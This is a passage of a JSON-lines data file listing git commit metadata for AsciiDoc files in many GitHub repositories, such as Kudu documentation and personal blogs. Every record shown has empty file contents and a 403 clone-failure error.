<2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11aaaa31a512b02add5491db6ac6b059377dbbb5","subject":"Update 2016-10-10-Math-Test-1.adoc","message":"Update 2016-10-10-Math-Test-1.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-10-Math-Test-1.adoc","new_file":"_posts\/2016-10-10-Math-Test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff412ed4f5a6ce3f85774aa61883aaca2bb64948","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c4211f4a0d4fa7c8559261badff6ff8e6ed416a","subject":"Update 2015-06-14-Znaj-svoj-instrument.adoc","message":"Update 2015-06-14-Znaj-svoj-instrument.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2015-06-14-Znaj-svoj-instrument.adoc","new_file":"_posts\/2015-06-14-Znaj-svoj-instrument.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1c9d12241274ab0cf8cda2d5f0fe08c93763f8c","subject":"render documentation with asciidcotorfy","message":"render documentation with asciidcotorfy\n","repos":"tomitribe\/community","old_file":"mongodb-example\/README.adoc","new_file":"mongodb-example\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomitribe\/community.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d83a8304f28c5b081cb5fcb6ca17af7a32a85a0","subject":"Update 2015-06-02-Citrus.adoc","message":"Update 2015-06-02-Citrus.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-02-Citrus.adoc","new_file":"_posts\/2015-06-02-Citrus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84244461d0aa5df1c041869ecbd2d18a0cca7659","subject":"[release_notes] replica management scheme notes","message":"[release_notes] replica management scheme notes\n\nAdded relevant notes on the new replica management scheme used\nin Kudu 1.7 by default:\n * the new replica management scheme is incompatible with old one\n * rolling upgrade 1.6 -> 1.7 is not possible\n\nChange-Id: I49f1f1e17cdaee272592d598431a33dbfe55123f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9571\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@gmail.com>\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac94cb0ff6b4ddd9a582368352e9f742532678b8","subject":"Add design doc for broker limits","message":"Add design doc for broker limits\n\nThis fixes #967\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/broker-limits.adoc","new_file":"documentation\/design_docs\/design\/broker-limits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed1cb346a7024f6b719c3e53ab3401f971c3e3d1","subject":"Publish 2018-2-2-Web-R-T-C.adoc","message":"Publish 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2018-2-2-Web-R-T-C.adoc","new_file":"2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8576287b4cb2204342a9729c94d1599284cbee14","subject":"Update 2015-05-12-First-Post.adoc","message":"Update 2015-05-12-First-Post.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2015-05-12-First-Post.adoc","new_file":"_posts\/2015-05-12-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mubix\/blog.room362.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a8f2f1018ff4bb8dee31cb20e6005fbb9ef0fb","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730bed965f70acbd3bd3fc4cfc9d6976a5f0765c","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c80a33422eeb5f06429949de6610d1254aea9dfe","subject":"Update 2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","message":"Update 2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","new_file":"_posts\/2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"081fc2f5ff96cb59c50edaa8ada22de76a091708","subject":"Update 2015-02-09-Hello-World.adoc","message":"Update 2015-02-09-Hello-World.adoc","repos":"Murazaki\/murazaki.github.io,Murazaki\/murazaki.github.io,Murazaki\/murazaki.github.io,Murazaki\/murazaki.github.io","old_file":"_posts\/2015-02-09-Hello-World.adoc","new_file":"_posts\/2015-02-09-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Murazaki\/murazaki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4058df6ee08fa47bd2870726c59386b86075bea1","subject":"y2b create post Verizon MiFi 4G LTE Unboxing","message":"y2b create post Verizon MiFi 4G LTE Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Verizon-MiFi-4G-LTE-Unboxing.adoc","new_file":"_posts\/2012-01-06-Verizon-MiFi-4G-LTE-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b43422ad18474529d5af998fec4d8b806c4e6d1","subject":"Trying to Fix TOC for github etc.","message":"Trying to Fix TOC for github etc.\n","repos":"iGW\/byteport-api,iGW\/byteport-api,iGW\/byteport-api,iGW\/byteport-api","old_file":"demo.adoc","new_file":"demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iGW\/byteport-api.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"34e48e2c1774ad255aa918bc2c0d37b159e659dc","subject":"added readme","message":"added readme\n","repos":"jexp\/cypher-utils,jexp\/cypher-utils,jexp\/cypher-utils","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jexp\/cypher-utils.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0771152d9edc13c639f537dece2b887f0f5e6a78","subject":"Address comments about glslc doc.","message":"Address comments about glslc doc.\n","repos":"fuchsia-mirror\/third_party-shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,antiagainst\/shaderc,antiagainst\/shaderc,dneto0\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,dneto0\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuchsia-mirror\/third_party-shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a56911fc6ea64b51f72d83fea7598e1b2c18eef","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/10\/29\/deref.adoc","new_file":"content\/news\/2021\/10\/29\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0a4c23859e02d40bc9336f5b46d61e5a8416cc74","subject":"Initial commit for a new readme","message":"Initial commit for a new readme\n","repos":"JoergM\/consul-examples,JoergM\/consul-examples,JoergM\/consul-examples","old_file":"showcase\/readme.adoc","new_file":"showcase\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JoergM\/consul-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6eafea5d8c323f5c3e9f2a6e4ba9e4a4ae0cc3af","subject":"ClojureScript 1.10.516 Release (#280)","message":"ClojureScript 1.10.516 Release (#280)\n\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2019-01-31-release.adoc","new_file":"content\/news\/2019-01-31-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"377a61eb78fbe149288dd3b16096775082413db8","subject":"Update 2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","message":"Update 2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","new_file":"_posts\/2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b92a0c8d844c8753274b41845eade083e7ce27a","subject":"Renamed '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc' to '_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc'","message":"Renamed '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc' to '_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9fba79cbe166a9fafa84fca5e13b76b65e43fc8","subject":"Update 2015-07-16-How-Seque-Works.adoc","message":"Update 2015-07-16-How-Seque-Works.adoc","repos":"skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io","old_file":"_posts\/2015-07-16-How-Seque-Works.adoc","new_file":"_posts\/2015-07-16-How-Seque-Works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skeate\/skeate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0118992ba1fd56f5e0c8f90406b3c4155926de6","subject":"Update TODO","message":"Update TODO\n","repos":"spodin\/algorithms","old_file":"TODO.adoc","new_file":"TODO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e229411b4b4b742fb49cda2301df2c631a87a1","subject":"add drafts","message":"add drafts\n","repos":"lancegatlin\/techblog,lancegatlin\/techblog","old_file":"drafts\/scala-type-classes.asciidoc","new_file":"drafts\/scala-type-classes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lancegatlin\/techblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f50625186ef8db0e72cdd6a19ed297609d59cc04","subject":"Document current state of aktualizr to backend events","message":"Document current state of aktualizr to backend events\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr","old_file":"docs\/ecu_events.adoc","new_file":"docs\/ecu_events.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"80aabe2ed356e8813e6f17932ff55c056211fc81","subject":"chore: Add documentation for automated release scripts","message":"chore: Add documentation for automated release scripts\n","repos":"christophd\/citrus-simulator,christophd\/citrus-simulator,christophd\/citrus-simulator,christophd\/citrus-simulator","old_file":"tools\/cli\/README.adoc","new_file":"tools\/cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christophd\/citrus-simulator.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3347342eebd25a83ceecd8a804d672be723e26ae","subject":"Update 2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","message":"Update 2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","new_file":"_posts\/2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9695ae338fc0acd548294d60f15250cd75f85c8","subject":"Add new API specification","message":"Add new API specification\n","repos":"tobbez\/lys-reader","old_file":"doc\/api.asciidoc","new_file":"doc\/api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tobbez\/lys-reader.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"c3b7f13f5117ecb82cfe8bba8352c0d71ee30025","subject":"ispell fix","message":"ispell fix\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"resume.adoc","new_file":"resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e11dfa673d542ed7e5018f4ea0ed1feccc0998c","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0897c5b2f5d36a49e063d2664171979084adb808","subject":"Document data import and processing","message":"Document data import and processing\n","repos":"cvut\/sirius,cvut\/sirius","old_file":"docs\/data-import-and-processing.adoc","new_file":"docs\/data-import-and-processing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cvut\/sirius.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf17a621b646e8de7cc4025f0411e270242e27cb","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b15497b90e249cbb084f053f7264e1356d4a378e","subject":"Update 2016-04-12-Can-I-find-Your-internet-Shadow.adoc","message":"Update 2016-04-12-Can-I-find-Your-internet-Shadow.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Can-I-find-Your-internet-Shadow.adoc","new_file":"_posts\/2016-04-12-Can-I-find-Your-internet-Shadow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a407b9fe98b212ad9d77e98a745bdba5a9747e7","subject":"Update 2018-03-19-google-cloud-computing-deploy.adoc","message":"Update 2018-03-19-google-cloud-computing-deploy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-google-cloud-computing-deploy.adoc","new_file":"_posts\/2018-03-19-google-cloud-computing-deploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c36a9fe903a4705012d1205206401bf9101803d4","subject":"[docs] Add basic advice on setting block cache size","message":"[docs] Add basic advice on setting block cache size\n\nThis adds a short section to the troubleshooting guide about improving\nthe performance of the block cache. It's fuzzy since the\neffectiveness of the cache and the efficacy of enlarging it are so\nworkload dependent (e.g. consider a workload doing full table scans vs.\none mostly re-scanning a small range checking for updates), but I tried\nto provide a starting point for users to evaluate their cache size since\nwe've totally lacked any advice on that up to this point.\n\nI also added information about the change due to release in 1.8 that\nservers won't start when the block cache capacity is set too large\nrelative to the memory limit.\n\nChange-Id: Idc7411c38b6fcc8694509ec89c32e2fe74e6c0db\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11420\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca40c675ffd812f571ad759eabb8d2b7ded55ee3","subject":"Update 2016-03-18-Blog-Title.adoc","message":"Update 2016-03-18-Blog-Title.adoc","repos":"thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io","old_file":"_posts\/2016-03-18-Blog-Title.adoc","new_file":"_posts\/2016-03-18-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thockenb\/thockenb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ec7d61a671a3e4ddcb1b15ab193eb4d25a237f8","subject":"Update 2018-10-18-Deck-Setup.adoc","message":"Update 2018-10-18-Deck-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-10-18-Deck-Setup.adoc","new_file":"_posts\/2018-10-18-Deck-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8484a82afc38e152ac6ba8560be95c386ea58228","subject":" doc update","message":" doc update\n","repos":"CNRS-DSI-Dev\/user_servervars2,CNRS-DSI-Dev\/user_servervars2","old_file":"doc\/doc.adoc","new_file":"doc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CNRS-DSI-Dev\/user_servervars2.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bfc39e3c60f068f0aa6bb2790304da04598344ce","subject":"Update 2016-03-19-My-title.adoc","message":"Update 2016-03-19-My-title.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2016-03-19-My-title.adoc","new_file":"_posts\/2016-03-19-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4101748967a26fa95766141533de9115dafe9327","subject":"Update 2015-09-25-Second-post.adoc","message":"Update 2015-09-25-Second-post.adoc","repos":"spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress","old_file":"_posts\/2015-09-25-Second-post.adoc","new_file":"_posts\/2015-09-25-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spe\/spe.github.io.hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de385a43cc21117a1601c78749416265f9c23522","subject":"Update 2016-11-30-golang-http.adoc","message":"Update 2016-11-30-golang-http.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-11-30-golang-http.adoc","new_file":"_posts\/2016-11-30-golang-http.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e1217871aae63a68b561efd4bdd50611b7c45f1","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80facf6a80786921c570fa160fa007392ac59dd4","subject":"Update 2015-12-23-Hello-world.adoc","message":"Update 2015-12-23-Hello-world.adoc","repos":"RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io","old_file":"_posts\/2015-12-23-Hello-world.adoc","new_file":"_posts\/2015-12-23-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RWOverdijk\/rwoverdijk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac45dd8e4f2cd8229cf44fef66557bd62052057","subject":"Update 